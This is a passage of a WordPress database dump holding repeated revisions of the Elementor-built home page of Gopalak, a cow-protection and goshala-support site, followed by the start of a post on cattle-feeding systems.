title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 10:28:46','2022-10-14 04:58:46','',1373,'https://gopalak.in/?p=1748',0,'revision','',0),(1752,1,'2022-10-14 10:31:56','2022-10-14 05:01:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 10:31:56','2022-10-14 05:01:56','',1373,'https://gopalak.in/?p=1752',0,'revision','',0),(1753,1,'2022-10-14 10:31:56','2022-10-14 05:01:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 10:31:56','2022-10-14 05:01:56','',1373,'https://gopalak.in/?p=1753',0,'revision','',0),(1754,1,'2022-10-14 10:31:56','2022-10-14 05:01:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 10:31:56','2022-10-14 05:01:56','',1373,'https://gopalak.in/?p=1754',0,'revision','',0),(1755,1,'2022-10-14 11:19:05','2022-10-14 05:49:05','There are different systems of feeding cattle in animal husbandry. For pastured animals, grass is usually the forage that composes the majority of their diet. Cattle reared in feedlots are fed hay supplemented with grain, soy and other ingredients to increase the energy density of the feed. The debate[where?] is whether cattle should be raised on fodder primarily composed of grass or a concentrate. The issue is complicated by the political interests and confusion between labels such as \"free range\", \"organic\", or \"natural\". Cattle raised on a primarily foraged diet are termed grass-fed or pasture-raised; for example meat or milk may be called grass-fed beef or pasture-raised dairy. The term \"pasture-raised\" can lead to confusion with the term \"free range\", which does not describe exactly what the 